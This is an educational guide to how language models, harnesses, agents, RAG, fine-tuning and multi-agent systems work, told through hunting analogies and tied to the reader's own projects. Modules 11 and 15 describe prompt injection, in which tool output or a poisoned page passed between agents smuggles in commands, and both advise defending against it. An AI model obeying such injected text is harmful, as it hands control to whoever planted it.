Field Guide · Module 00 · Orientation

A thermal reading of
artificial intelligence

You point a thermal scope at the dark and it doesn't see a hog — it reads heat and predicts shape. Modern AI works the same way: it doesn't know things the way you do, it predicts them from pattern. This guide takes you from that one idea all the way up to building autonomous agents — cold to white-hot, beginner to deep.

◦ The Heat Scale — how to read this guide
COLD · plain-English intuitionWHITE-HOT · the real machinery
Module 01 · The Core Idea Cold

What an AI actually is

Forget the sci-fi. At its heart, today's AI is one surprisingly simple machine doing one thing absurdly well.

A large language model — the thing inside Claude, ChatGPT, all of them — is a next-piece-of-text predictor. You give it some text, and it predicts what comes next. Then it adds that piece, looks at everything again, and predicts the next piece. Over and over.

That's it. That's the whole engine. It's the autocomplete on your phone, except instead of suggesting one word it has read a huge fraction of everything ever written, and it predicts not just the next word but paragraphs, code, arguments, plans — one small chunk at a time.

◦ Field analogy

A trail cam doesn't understand "deer." It has been tuned on millions of frames until it can predict, from a pattern of pixels, "this shape, at this hour, moving this way = deer." The model is the same trick at planetary scale, but for language instead of pixels. It has seen so much text that it has absorbed the statistical shape of how ideas follow one another — and through that, a startling amount about the actual world.

YOUR TEXT SO FAR "the buck crossed the…" THE MODEL billions of learned weights PROBABILITIES creek 41% field 22% road 11% pick one → add it → repeat
The prediction loop — the single move every LLM repeats to write anything at all.

Three things it is not

↳ In your world

When your Agent Bricks incident agent turns a Tronox Flash Report into clean JSON, no rule engine is parsing fields. The model is predicting "given this messy report, the next characters of a well-formed JSON object are…" — pattern completion pointed at a structured target.

Module 02 · Representation Cool

Tokens & meaning-as-geometry

Before a model can predict text, text has to become numbers. How that happens explains a lot of the model's quirks.

Models don't see letters or words. They see tokens — chunks of text, usually about ¾ of a word. Common words are one token; rare ones get split. hunting is one token; WuTangNAS is several stitched-together pieces.

Every token is turned into an embedding: a long list of numbers (a vector) that places the token as a single point in a vast multi-dimensional space. The whole point of that space is that meaning becomes distance. Tokens with similar meaning sit near each other; unrelated ones sit far apart.

"deer near the creek" deer near the creek ↓ each becomes a vector ↓ deer → [0.4, -1.2, 0.8, …] MEANING SPACE (simplified to 2D) deer buck elk spreadsheet invoice close = similar meaning far = unrelated
Text → tokens → vectors → points in "meaning space." Geometry does the semantic heavy lifting.
◦ Why this is wild

Because meaning lives in geometry, you can do arithmetic on concepts. The classic result: take the vector for "king," subtract "man," add "woman," and you land right next to "queen." The model never learned that rule — it fell out of the shape of the space, learned purely from reading.

This representation explains real behavior you'll hit:

Under the hood · what's in the vector

An embedding is typically hundreds to thousands of numbers (dimensions). Each dimension isn't a clean human label like "animal-ness" — meaning is distributed across many of them at once. During training the model arranges this space so that whatever directions help it predict the next token become the axes of meaning. Position encoding is also added so the model knows token order, since "creek near deer" and "deer near creek" share tokens but differ in arrangement.

Module 03 · The Architecture Warm

Transformers & attention

One idea — "attention" — is why this generation of AI works at all. It's the T in GPT.

To predict the next token well, the model has to figure out which earlier tokens actually matter. The mechanism that does this is attention: for every token, the model looks across all the other tokens and weighs how relevant each one is, right now, to what it's trying to predict.

◦ Field analogy

Read: "the buck crossed the creek and then it bedded down." To know what "it" means, you glance back and lock onto "buck," not "creek." Attention is that glance — done for every word, against every other word, all at once. The model learns to point each token's attention at whatever helps predict what comes next.

the buck crossed creek it predicting from "it" — where does it look? strong attention → "buck" weak → "creek" thickness = attention weight · the model learns these weights from data
Attention in one picture: each token weighs every other token by relevance.

Stacked into layers

A single attention pass isn't enough. A transformer stacks dozens of these blocks. Each block re-mixes the tokens through attention and then a small processing step, passing richer representations up the stack. The pattern that emerges in practice:

tokens in LAYER 1 attention + process LAYER 2 LAYER N abstract meaning next-token prediction
A transformer is a tall stack of attention blocks — shallow patterns at the bottom, abstract meaning at the top.
Under the hood · query, key, value (the real mechanic)

Each token produces three vectors: a query ("what am I looking for?"), a key ("what do I offer?"), and a value ("what I'll hand over if chosen"). The model compares one token's query against every token's key to get a relevance score, softmaxes those scores into weights that sum to 1, then blends everyone's values by those weights. That blend is the token's new, context-aware representation.

"Multi-head" attention just runs several of these in parallel, each free to track a different kind of relationship — one head might follow grammatical subjects, another long-range references like our "it → buck." Crucially it's all matrix multiplication, which is why GPUs eat it for breakfast and why this architecture scaled when older sequential ones (RNNs) stalled.

Module 04 · Training Warm

How it learns

Where the "intelligence" comes from: three stages that turn raw text into a helpful assistant.

The model starts as billions of random numbers (parameters, or "weights"). Training is the process of nudging those numbers until the machine gets good at prediction. It happens in three stages, each doing a different job.

1 · PRETRAINING read ~everything, predict next token → raw knowledge & skill 2 · FINE-TUNING show good question→answer pairs → acts like an assistant 3 · PREFERENCE TUNING rank responses, learn what's preferred → helpful & safe (RLHF) COST & TIME shrinks left → right · pretraining = months + massive compute · later stages = cheaper, sharper steering capability is born in stage 1 · behavior is shaped in stages 2 & 3
The training pipeline. The raw model knows everything and behaves like no one; tuning gives it manners.
◦ Field analogy

Training is sighting in a rifle, a few billion times. Each training example is a shot: the model predicts, you measure how far off it landed from the true next token (the "loss"), and you nudge the weights a hair toward center. One shot teaches almost nothing. Trillions of shots, and the groupings tighten into something that writes code and explains attention. That nudging process is gradient descent — the math just tells you which direction, and how far, to turn each of the billions of knobs.

What "learning" leaves behind

↳ In your world

This is why a base model can't know your 10.175.128.x subnet or your Holosun case number. That knowledge was never in training — it has to ride in through context or a tool. Most of "using AI well" is really the craft of getting the right things in front of frozen weights at the right moment.

Module 05 · Running the Model Warm

Inference, sampling & the context window

What actually happens the instant you hit enter — and the single most important constraint to understand.

Using a trained model is called inference. It computes the probability of every possible next token, then has to actually pick one. How it picks is controlled by a dial called temperature.

LOW TEMPERATURE focused · repeatable · "just the facts" HIGH TEMPERATURE creative · varied · sometimes weird temperature reshapes the same probabilities — flatter = more random, peakier = more deterministic
Temperature is the randomness dial. Low for code and facts, higher for brainstorming and prose.

This is why the same prompt can give different answers, and why a model can sound certain about something it's inventing — it's sampling from a distribution, not reciting a record.

The context window — the one limit that explains everything

The context window is everything the model can see at once: your message, the system instructions, the conversation history, any documents or tool results — all of it, counted in tokens. It is the model's entire working memory. Nothing outside the window exists to the model.

— THE CONTEXT WINDOW · everything in here is visible — systeminstructions conversationso far docs / toolresults your newestmessage 🗑 older history… …once it overflows, the oldest tokens fall out of view and are simply gone.
Working memory, not long-term memory. When it's full, the oldest content drops off the edge.
Module 06 · Running the Model Warm

Thinking before answering

Some models are trained to spend extra inference on a private scratchpad before they reply — a second way to buy accuracy, paid in tokens.

There are two ways to make a model smarter. The old lever is train-time scale — more parameters, more data. Reasoning models add a second: test-time compute. Instead of a bigger model, you let the same model do more work at the moment you ask — generating a long private chain of reasoning, then writing the answer you see. Spent well, that compute can let a smaller model match a much larger one on hard problems.

The "thinking" is not a new kind of cognition. It's the same next-token prediction from Module 5, just a lot more of it, aimed inward: more tokens means more chances to break a problem into steps, try an approach, notice a mistake, and correct course before committing. OpenAI calls these reasoning tokens; Anthropic emits thinking content blocks. Either way they're billed as output (you pay for every one), they eat context-window space, and the raw trace is usually hidden or summarized — you see a précis, not the full scratchpad.

◦ Field analogy — this one's yours

Glassing the field vs. snapping the shot. A normal model is the snap shot — fast, fine when the hog's broadside at 40 yards. A reasoning model is glassing before the trigger: settle the AGM Taipan, range it, read the wind, check what's behind the target, confirm it's a hog and not a calf — then shoot. That costs time (latency) and you burn it on every setup whether the shot was easy or not (cost). On a hard, low-light shot it's the difference between a clean kill and a wounded animal lost in the brush. On a 40-yard gimme the glassing changed nothing. Glass when the shot is hard; don't glass a gimme. And glassing carefully isn't the same as hitting — you can range, read, and breathe perfectly and still miss.

STANDARD MODEL · FAST · CHEAP prompt model answer REASONING MODEL · REASONING / THINKING TOKENS · hidden · billed prompt step step try / check backtrack answersame shape SLOWER · COSTLIER · better on hard problems · the loop-back is self-correction the extra work happens inside a hidden region you pay for, before the same kind of answer comes out
Same engine, more tokens spent inward first. You pay for the scratchpad whether the problem needed it or not.

Trained to reason vs. just told to

This is the honest distinction from "think step by step." Prompted chain-of-thought is an inference-time trick on a normal model: you write "let's think step by step" and it produces visible steps. It helps, but the model was never trained to reason — it's pattern-matching the shape of worked examples and can't reliably backtrack or check itself. A trained reasoning model has the chain-of-thought baked in by reinforcement learning: it's rewarded for reaching correct answers on checkable problems (math, code, logic), and over training it learns strategies — self-verification, trying alternatives, catching its own errors mid-stream. DeepSeek-R1 showed these behaviors emerge from RL without being programmed. That's why you don't need to tell a reasoning model to slow down; it already does, and its self-correction is real rather than performed.

The control dial: reasoning effort

You don't just toggle thinking on and off — you meter it. OpenAI exposes reasoning.effort (none → minimal → low → medium → high → xhigh, model-dependent). Anthropic exposes extended thinking with a budget_tokens cap or an adaptive effort where the model decides how much to think per request. Newer models lean adaptive: think hard on the hard parts, barely at all on the easy ones. The tradeoff stated plainly: higher effort buys accuracy on genuinely hard problems, at the cost of more latency (seconds to minutes) and more dollars — and on easy problems it buys little or nothing.

Reach for reasoning
USE IT FOR
SKIP IT FOR
Shape of task
Multi-step math, hard logic, proofs
Lookups, definitions, simple Q&A
Engineering
Tricky debugging, refactors, planning
Formatting, summarizing, rewriting
Stakes / volume
When a wrong answer is expensive
High-volume, latency-sensitive calls

The rule: reasoning buys accuracy on hard problems, and you pay for it whether the problem was hard or not. Reach for it when correctness matters more than speed and the problem actually needs steps. Default to a normal model otherwise.

Under the hood · the harder caveats

Not a correctness guarantee. More thinking raises the odds on reasoning-heavy tasks; it does not make the model right. A reasoning model can think for 30 seconds and still confidently hand you a wrong answer — the trace can rationalize a flawed conclusion just as fluently.

Overthinking is real. Test-time compute does not monotonically improve accuracy. Past a point, extra reasoning can talk a model out of a correct first instinct and degrade its confidence calibration. Bigger budget ≠ better.

Weak on knowledge-bound tasks. When the bottleneck is what the model knows rather than how it reasons, more thinking gives little benefit and can increase hallucination. Thinking can't conjure facts it doesn't have — that's a job for retrieval (RAG, Module 12), not more reasoning tokens.

The trace is summarized. You generally can't fully audit why it concluded something; don't treat the visible "thinking" as a faithful, complete log.

↳ In your world

Reach for effort surgically, not globally. Marked's "Ask Your Journal" is the wrong place — it's retrieval-and-summarize (knowledge-bound), where extra thinking adds cost and can increase hallucination; use a fast model + good RAG. The Tronox extraction's planning step — mapping a messy Flash Report into the schema, reconciling ambiguous fields — is a legitimate place to dial reasoning up, because a wrong structured value flowing to finance is expensive; the bulk extraction stays cheap. On OpenRange / Argus, effort is a cost knob exactly like a per-run token budget: on a Jackery-powered offline node, "think harder" literally means "burn more battery per detection," so routine motion classification wants low/none, reserving thinking for genuinely ambiguous frames.

⌥ Hand to Claude Code

Build a reasoning-effort A/B harness over ~20 real Flash Reports. Run the extraction twice — once at low/none, once at high — and log per report: accuracy vs. a hand-labeled gold set, total tokens (including reasoning tokens from usage / output_tokens_details), latency, and dollar cost. First step: write the gold labels for the 20 samples and a thin runner that flips one effort parameter and records the usage block. The payoff is a number you can feel — "high effort cost 6x and only fixed 2 of 20," or "it fixed the 3 that mattered." Any alerts go through ntfy only.

Module 07 · The Pivot Warm → Hot

The model vs. the thing you talk to

Everything so far described the engine. Now we put a vehicle around it.

A raw LLM is just the prediction engine from Modules 1–6: text in, next token out. By itself it has no persona, no rules, no tools, no memory, no idea it's in a chat. The product you actually use — Claude, ChatGPT, Claude Code, your Marked chatbot — is the model plus a whole apparatus wrapped around it. That apparatus is the harness, and it's where almost all the product engineering lives.

WHAT THE MODEL IS prediction engine text in → next token out + WHAT YOU TALK TO = + HARNESS engine system prompt tools memory the loop
Same engine, both sides. The difference between a curiosity and a product is everything bolted around it.

This distinction is the hinge of the whole guide. From here up, the heat is about systems, not the engine. The engine barely changes between "a chatbot" and "an autonomous agent that refactors your codebase" — the harness is what changes.

Module 08 · The Scaffold Hot

Harnesses

The single most useful concept for a power user. Once you see the harness, you can't unsee it.

A harness is everything wrapped around the raw model to turn a next-token predictor into a useful system. It's the part you, as a builder, actually design and control.

◦ Field analogy — this one's yours

The LLM is the bare thermal sensor. On its own it's a chip that turns heat into a signal — useless in your hands. The harness is the whole scope: the housing, the reticle, the rangefinder, the ballistic calculator, the zeroing, the trigger discipline built into how you use it. Same sensor sits inside a $300 monocular and a $5k AGM — the instrument around it is what makes one deadly. Claude Code, your Marked chatbot, your Agent Bricks agent: all the same sensor, different scopes.

THE HARNESS LLM engine system promptrules · persona · format tool definitionswhat it can do memory / statewhat persists context managerwhat gets shown the loop / controlwhen to call again guardrailslimits · checkpoints
The components of a harness. Designing these well is 90% of building good AI products.

The pieces

⌥ Hand to Claude Code

A great way to feel a harness is to build the thinnest possible one: a ~40-line script with a system prompt, one tool (say, a function that reads a file), and a single model call. Have Claude Code scaffold tiny-harness/ with the Anthropic SDK, then add a second tool and watch the system prompt do the steering. This makes Modules 8–10 concrete instead of abstract.

Module 09 · The Big Distinction Hot

Chat vs. agents

The question you actually asked. The answer is smaller than it looks — and it lives entirely in the harness.

Same engine. The difference between "a chatbot" and "an agent" is not the model — it's how many times the harness lets the model act, and whether the model gets to decide its own next step.

Dimension
CHAT
AGENT
who loops
you do — every turn is yours
the model does — autonomously
model calls
one per message
many per goal, in a loop
acts in the world
only if you wire a tool, one shot
yes — chains tool calls toward a goal
error correction
you catch & re-ask
can see failure & retry itself
best for
thinking, drafting, Q&A, advice
multi-step tasks with checkable results
main risk
low — you gate everything
runs away, compounds errors, acts irreversibly
CHAT — human is the loop you ask model answers you decide next youre-ask AGENT — model is the loop you set GOAL think act (tool) observe result loop untildone
The whole distinction in one frame: who closes the loop — you, or the model.

It's a spectrum, not a switch

↳ In your world — where your projects sit on the spectrum

Asking me to draft a vendor email = chat. Your incident-extraction agent (Flash Report in → fixed parse → JSON out) is really a workflow — same path every time, which is exactly what you want for something that feeds finance. Claude Code editing across files, running your tests, reading the failure, fixing, re-running = a true agent. Knowing which one a task should be is half of using AI well.

Module 10 · The Engine of Autonomy Hot

The agent loop

This is the diagram to tattoo on your brain. Every agent — Claude Code, a research agent, your future projects — is some version of this.

An agent is a loop with a goal. The model thinks about what to do, acts by calling a tool, observes the result, and repeats — each result folded back into context so the next thought is better informed. This pattern is often called ReAct: Reason + Act.

GOAL (you set it) "get this done" THINKwhat next? ACTcall a tool OBSERVEread result UPDATEfold into context DONE? goal met → stop & report repeat until done
THE loop. Think → Act → Observe → Update, checked against the goal each pass.

Why looping is the superpower

A chat model gets one shot. An agent gets to be wrong and recover. It can write code, run it, read the error, fix it, and re-run — exactly what a human engineer does. The loop turns a one-shot guesser into something that converges on a working result. That's why Claude Code can actually fix a failing test suite instead of just suggesting a patch and hoping.

◦ Why looping is also the danger

The same autonomy that recovers from errors can compound them. Loops can spin forever, wander off-goal, burn tokens, or — worst case — take an irreversible action (delete a file, send the wrong email, push bad code). Every serious agent harness therefore has brakes: a max-iteration budget, a token/time budget, clear stopping conditions, and human checkpoints before anything irreversible. Autonomy without brakes isn't powerful, it's a liability.

⌥ Hand to Claude Code

Building a real loop is the best way to internalize this. A clean starter for your world: a small local agent whose only tool is "send ntfy notification," with a goal like "watch this log file and alert me when pattern X appears." It exercises the full Think→Act→Observe cycle with a safe, reversible action and lands squarely on your ntfy-first rule. Natural on-ramp toward the OpenRange / Argus alerting brains.

Module 11 · Touching the World Hot

Tools, function calling & MCP

The "act" in the loop. How a frozen text-predictor reaches out and changes something real.

A model can't natively query your database or push a notification — it only emits text. Tools bridge that gap. You describe a function to the model ("send_ntfy, takes a message"); when it wants to use it, it emits a structured request; your harness runs the real function and feeds the result back into context. That request-and-return protocol is function calling.

MODEL emits text only "call send_ntfy {msg:'hog at gate'}" HARNESS runs the real function 🔍 web search 🗄 query database 📟 send ntfy ⚙ run code result returned to model's context → loop continues
Tools = the model's hands. It asks; the harness does; the result comes back as new context.

MCP — the standard that makes this plug-and-play

Early on, every tool had to be wired by hand into every app. MCP (Model Context Protocol) fixes that: it's an open standard for exposing tools and data so any model can plug into any tool without custom glue. Think of it as USB-C for AI — one connector shape, and your Pocket recorder, Gmail, Drive, Supabase, and a dozen others just snap in.

↳ In your world — you're already doing this

Your Pocket voice-recorder MCP is exactly this pattern: Pocket exposes "search my recordings" as an MCP tool, and I can call it to pull a transcript into context, then build learning materials from it. Same with your Gmail/Outlook connectors for batch inbox triage. When you wondered about Omnigent as a meta-harness for coding agents — that's a harness that orchestrates other harnesses, and MCP is the wiring that lets them all share tools.

Under the hood · the security edge of tools

Tools are where an AI stops being a sandbox and starts having real-world reach — which is where risk concentrates. Two failure modes matter. First, prompt injection: content a tool pulls in (a web page, an email, a file) can contain text trying to hijack the model's instructions. Treat tool output as untrusted data, never as commands. Second, irreversible actions: a tool that deletes, sends, pays, or changes permissions deserves a human checkpoint, because an agent's confident mistake executes instantly. The rule of thumb: read-only tools can run free; world-changing tools get a gate.

Module 12 · Feeding the Window Hot

Context engineering, RAG & memory

The model only knows what's in its window (Module 5). So the real art is deciding what goes in it.

Since the weights are frozen and the window is finite, everything useful comes down to one craft: getting the right information in front of the model at the right moment. That's context engineering, and it has two big tools — retrieval and memory.

RAG — Retrieval-Augmented Generation

Instead of relying on what the model memorized, RAG fetches relevant material at question time and stuffs it into the window before the model answers. The fetch uses the embedding space from Module 2: your question becomes a vector, and you grab the nearest chunks of your own documents.

your question"best stand in wind?" embed +search store vector DB of your notes nearest chunks3 relevant journal entries model answersgrounded in YOUR data
RAG: retrieve relevant chunks first, then answer from them. How "chat with your docs" works.
↳ In your world

Marked's "Ask Your Journal" is RAG: your harvest logs and stand notes get embedded into Supabase, a question retrieves the most relevant entries, and the model answers grounded in your seasons — not generic deer facts. RAG is also the honest fix for hallucination and stale knowledge: instead of trusting the model's memory, you hand it the source and say "answer from this."

Memory — persistence across the gaps

The model forgets everything between sessions. Memory is a harness feature that stores durable facts and selectively re-injects them into context when relevant — so it can "remember" your subnet, your vendors, your projects. Key mental model: the model isn't remembering; the harness is reminding. Memory is a store on the side, loaded back into the window on demand.

◦ The discipline

More context is not better context. A window stuffed with marginally-related junk dilutes the model's focus and can bury the one instruction that mattered. Good context engineering is curation, not accumulation: the fewest, most relevant tokens that fully specify the task. When a long agent run gets polluted with dead ends, the right move is often to start a fresh window with a clean summary — not to keep piling on.

Module 13 · The Decision Warm → Hot

Fine-tuning vs. RAG

Now that you know what RAG is, here's when to reach for it versus changing the model itself.

RAG changes what the model knows; fine-tuning changes how the model behaves. Pick by asking which of those your problem actually is — and most of the time the honest answer is "reach for retrieval first."

They get confused because both are sold as "customize the AI on your data," but they're completely different levers. RAG leaves the frozen weights alone (Module 4): at question time it fetches the relevant facts from an external store (Module 12) and drops them into the context window. Knowledge lives outside the model; you swap it freely. Fine-tuning continues training the model on your examples so its default behavior shifts — tone, format, the shape of an answer, a niche task it does reliably without being re-instructed. Knowledge baked into weights; changing it means training again.

◦ Field analogy

Open-book vs. closed-book exam. RAG is an open-book exam: the model looks every fact up in your binder at question time — so the binder can be today's incident reports, and the answer cites the page. Fine-tuning is a closed-book exam: the model studied until the way it answers is second nature, but whatever wasn't in the studying isn't in its head. RAFT is studying and then sitting the open-book exam — it learned how to read your binder and ignore the irrelevant pages. You don't cram facts the night before; you keep facts in the binder and fine-tune the test-taking technique. On the scope: fine-tuning is re-flashing the firmware's image processing; RAG is the rangefinder feeding a live number into the ballistic calc each shot. You'd never re-flash firmware to account for today's wind — you feed today's wind in live.

What do you needto change? KNOWLEDGE BEHAVIOR facts: fresh · proprietary · cited format · style · narrow task · latency RAGretrieve at inference Fine-tuneadapt the weights Compose (RAFT):fine-tune behavior + RAG for facts
Two levers, one decision: change what it knows (RAG) or how it behaves (fine-tune) — and the strong systems do both. Default: start with RAG; don't fine-tune to add facts.

Which lever, when

The decision question, front and center: is my problem about what the AI knows, or how it behaves? Knowledge → RAG. Behavior → fine-tuning. And they're not rivals — the strong pattern is fine-tune for behavior and layer RAG for facts. Berkeley's RAFT formalizes it: a model fine-tuned specifically to read retrieved documents — including learning to ignore irrelevant "distractor" chunks — beats either approach alone on domain-specific QA.

Failure modes — credibility lives here

2025/26 default: start with RAG (and good prompting). Fine-tune only once you've proven RAG can't deliver the behavior you need — it handles the large majority of "use our data" asks faster, cheaper, and reversibly.

Under the hood · flavors of fine-tuning

Full fine-tuning — update every weight. Most powerful, most expensive, needs real GPU infra, and risks "catastrophic forgetting" of general ability.

LoRA / PEFT — freeze the base model, train a tiny set of low-rank adapter matrices (often <0.5% of parameters). 10–20× less memory while keeping ~90–95% of full-tune quality; adapters can be merged back so there's no extra inference latency. QLoRA adds quantization to fit on a single consumer-ish GPU. This is what "fine-tuning" usually means in practice today.

Instruction tuning — the Module-4 stage that turned a raw predictor into an assistant; your task-specific fine-tune is the same machinery aimed narrower.

↳ In your world

Marked's "Ask Your Journal" is the textbook RAG case — your harvest logs change every season and the answer must be grounded in your entries with the entry as the source. Fine-tuning a model on your journal would be the classic mistake: slow learning, blended hallucinated "facts," and a retrain every time you log a hunt. Where fine-tuning could actually earn its place is the Tronox incident-extraction workflow — if the long prompt forcing the exact Flash-Report → JSON shape ever gets brittle or token-heavy at volume, a small LoRA that bakes in the output shape (behavior, not facts) is legitimate; the incident content still rides in via context. And your medallion Silver/Gold tables are a natural retrieval corpus for an "ask the warehouse" assistant — governed, changing, proprietary — never something you'd freeze into weights.

⌥ Hand to Claude Code

Add an honest A/B inside Marked's "Ask Your Journal." Keep the existing RAG path, then wire a deliberately wrong comparison: answer from the base model with no retrieval — same question, side by side. First step: add a ?mode=noretrieval flag to the Ask-Your-Journal endpoint that skips the Supabase vector search and asks the model cold. Log both answers. You'll feel the difference — the no-retrieval path inventing plausible stand-and-wind "facts" is the hallucination-from-missing-knowledge failure made concrete, and the cleanest proof of why "fine-tune to add knowledge" is a trap.

Module 14 · Systems of Agents White-hot

Multi-agent orchestration

When one loop isn't enough: split the work across specialists with a coordinator.

A single agent juggling a huge task fills its window with too many concerns and starts dropping threads. The fix mirrors how you'd run a crew: break the job into roles, give each a clean context, and have a coordinator stitch the results together.

ORCHESTRATOR plans · delegates · synthesizes RESEARCHERgathers facts BUILDERwrites / executes CRITICchecks the work own loop own loop own loop results flow back up → orchestrator assembles the final answer
Orchestrator-worker pattern: a coordinator delegates to specialists, each with its own clean loop.

Common patterns

◦ The tradeoff — don't reach for this too early

Multi-agent is more capable and dramatically more expensive, slower, and harder to debug — errors hide between agents, costs multiply, and coordination itself can fail. The discipline: start with the simplest thing that works. One good prompt beats a chat-with-tools that beats a single agent that beats a multi-agent swarm — reach up the ladder only when the rung below genuinely can't carry the task.

↳ In your world

This is the frontier you're poking at with Databricks agentic experiments and Omnigent (a meta-harness coordinating coding agents). The same orchestrator-worker shape maps onto a future Tronox build: a planner agent that routes "extract this incident," "reconcile this logistics cost," "draft this IBP note" to specialized sub-agents — but only once each single-agent piece is proven solid on its own. How these agents actually get wired — and how they share what they know without poisoning each other — is the next module.

Module 15 · Systems of Agents White-hot

Orchestration & shared context

You decided one agent isn't enough — now the hard part isn't the agents, it's the wiring between them.

Module 14 answered should you go multi-agent. This answers how it's wired: which shape routes the work, and how agents that each have their own separate context window — possibly running in different harnesses — share what they've learned without flooding, contradicting, or poisoning each other.

The topologies — pick the shape that matches the work

Module 14 named three patterns in passing. Here's the fuller toolkit, and the rule for when each fits is always the same question: how coupled are the subtasks? Independent work fans out; dependent work must serialize or share state.

Shared context — the genuinely hard part

The uncomfortable truth: each subagent has its own context window, and they cannot see into each other's. A worker never witnesses the lead's reasoning or its siblings' transcripts — it gets only what was explicitly handed to it, and the lead gets back only what the worker chose to return. There is no shared mind; there is only what you wire through the seams. Three ways agents share state, coldest to hottest:

1 · MESSAGE PASSING agent A agent B distilled call raw transcript 2 · BLACKBOARD SHAREDSTATE spec 1 spec 2 single writer read write 3 · ACROSS HARNESSES HARNESS Aagent HARNESS Bagent MCP → tools MCP → tools store A2A → agent merge = untrusted input
Agents never share a mind — only what crosses the seam. Pass the call, not the feed; one writer to shared state; treat a peer's output as data, not commands.

Across harnesses, and why opacity is correct

When agents live in different harnesses (or vendors/frameworks), there's no shared process, no shared window, no implicit anything — they share context only through an explicit boundary protocol. The emerging standard split, stated plainly:

Summarization at boundaries is load-bearing, not optional. Every handoff is a lossy compression, so good systems make the summary structured (schema'd fields, not prose) and keep a pointer back to the source so a claim can be re-checked.

◦ Field analogy — the spotter/shooter pair

In a two-person thermal hunt the spotter is glassing a wide field and you're on the rifle. You do not share a sensor feed — you can't see through the spotter's scope, he can't see your reticle. What crosses between you is one tight, distilled call: "Hog, far tree line, 180, quartering left." That call is the handoff — a structured summary, not the raw stream. If the spotter narrated every warm rock and deer (the full transcript), you'd drown in it and miss the shot. You pass the call, not the feed — exactly A2A opacity, and exactly why subagents return distilled findings, not their context windows. And the trust angle lands: a bad range call propagates straight into a missed shot, with full confidence.

Provenance & trust on merge

When the orchestrator merges several agents' outputs, it is ingesting text it didn't write — and an LLM can't tell instructions-from-you from instructions-hidden-in-data. A worker that read a poisoned web page can return output carrying a smuggled command; if the lead treats merged worker output as trusted instructions, that's prompt injection between your own agents. This is the same hazard as Module 17, now turned inward. So: tag every contribution with where it came from, treat cross-agent output as data, not commands, and gate any consequential action behind verification — the least-privilege, cut-a-trifecta-leg posture from Module 17, applied to the seams inside your swarm.

Coordination failure modes — where it bites

Practical levers — what keeps it alive

◦ The discipline — most "agentic" work is a known pipeline in a costume

A Databricks Bronze→Silver→Gold medallion flow is a sequential pipeline topology with zero model-driven delegation: the flow is fixed, each stage transforms the prior one's output, state moves one direction, and you can re-run any stage idempotently. That's the deterministic end of the spectrum. You'd reach for agentic delegation only when you don't know the steps in advance — when a planner has to decide at runtime which transforms even exist. Wire the known part deterministically; spend agent tokens only on the genuinely open part.

Under the hood · control, termination, and the single-writer rule

Termination per topology. Orchestrator-worker: the lead decides it has enough and stops spawning — back it with a token/subagent budget so a slow or missing answer can't block forever. Recursion: a hard depth cap, because cost compounds with every level. Debate: a max-rounds limit, since convergence isn't guaranteed.

The single-writer rule makes a blackboard safe: one owner per slot, everyone else appends new entries rather than overwriting, and every entry carries a source and timestamp. Reads are free and concurrent; the only contention is writes, so you remove write contention by construction. Structured handoffs (schema'd fields) beat prose because the receiver can validate the shape before trusting the content — and a pointer back to the source lets any claim be re-checked. The MCP-vs-A2A split is the same idea at the protocol layer: tools are exposed (MCP), but peer agents stay opaque (A2A) — you expose the call surface, never the internal state.

↳ In your world

You already straddle both ends of the spectrum. Databricks workflows / medallion are deterministic orchestration — fixed pipelines you'd be crazy to make agentic. Omnigent is the model-driven end — a meta-harness coordinating other harnesses (Claude Code, Codex, Cursor), which is exactly the agents-across-harnesses problem: it governs them only through an explicit boundary (spend caps, sandboxing, pause-before-action), never by seeing inside their windows. And the Tronox future-build from Module 14 — a planner routing "extract incident," "reconcile cost," "draft IBP note" — is where shared-context discipline bites: those sub-agents must hand back structured results the planner can trust and trace, with the finance-write gated behind verification, because a merged conclusion with bad provenance writing to finance is the failure you can least afford.

⌥ Hand to Claude Code

Build a tiny blackboard coordinator for an OpenRange + Argus cross-harness scenario — local, ntfy-only, offline-first. First step: a single shared-state file shared/state.json with a strict schema and a single-writer rule per key (OpenRange owns detections[], Argus owns alert_thresholds). Write two tiny "agent" loops that each read the whole board but write only their own keys, append a source and ts on every entry (provenance baked in), and make each write idempotent (re-running can't double-append). Add a tiny "merge" reader that, before firing one ntfy push, checks provenance and refuses to act on any entry whose source it doesn't recognize — your in-house "treat peer output as data, not commands" guard. Stretch: a budget field that caps how many times a loop may write before it must stop, so you can watch termination work. You'll have built, in miniature, message-free shared state, single-writer safety, provenance-gated action, and a termination budget — the four levers, against your own offline stack.

Module 16 · The Measurement Warm → Hot

Evals — knowing it works

The hinge between how systems are built and how you operate them well: how you prove an AI system works, not just demo it.

An eval is how you find out whether an AI system actually works — not by watching one good demo, but by running it against a fixed set of real cases and scoring the output. Because the output is non-deterministic, "it passed once" tells you almost nothing; you need a measurement you can repeat.

◦ Field analogy — this one's yours

Zeroing a rifle. You don't call a scope zeroed because one round hit paper. You shoot a group at a known distance against a known point of aim, measure the offset, adjust the turrets, shoot again — and re-confirm at the start of a serious hunt because conditions drift. That's an eval, exactly: a fixed target (your eval set), a repeated measurement against ground truth (the bullseye = the gold answer), a scored miss, and an adjustment. One lucky shot dead-center proves nothing about the next ten — same reason a clean demo proves nothing about the next ten agent runs. pass^k is a tight group; pass@k is "at least one in the black." And "it looked good in the demo" is calling a rifle zeroed off a single round.

Why normal tests stop working

Traditional tests are exact: assert add(2,2) == 4 — same input, same output, forever, and a red test means a real bug. LLM output varies run to run, and the "right" answer is usually a set of acceptable answers, not one string. So assert response == "..." is either too brittle or meaningless. An eval is not a unit test — it's a measurement: run N cases, score each, report the rate. You're estimating a probability, not asserting a constant. A demo is one hand-picked sample with the operator steering: it has no denominator, so it tells you the system can succeed, never how often, and never where it silently fails.

Build the set from real failures, not imagination

The highest-leverage activity is error analysis: read real traces, tag what actually went wrong, group the tags into a failure taxonomy. An LLM has near-infinite ways to fail — you can't anticipate them, so don't pre-write evals before you've seen failures. The productive order: ship something small → look at outputs → discover failures → write a targeted eval for each → fix → repeat. Anthropic's guidance: start with 20–50 tasks from real failures and the manual checks you already run. Each case must be unambiguous (two domain experts independently reach the same verdict) and solvable (write a reference solution). The set is living: every new production failure becomes a new case, so that bug can never silently come back.

OFFLINE · pre-ship Eval setfailures + gold System under test Assertions (cheap) Reference check LLM judge (pricey) Pass rate ~70%CI gate ✓ / ✗ ONLINE · production Live traffic System Reference-free judge/ guardrails Drift & failures new failure → new eval case (the set is living)
Offline catches regressions before ship; online catches what you didn't imagine — and every new failure becomes a permanent eval case.

The grader ladder — cheap to expensive

Build evaluators in ascending cost; only climb when a cheaper rung can't capture the quality you care about.

Offline, online, and the CI gate

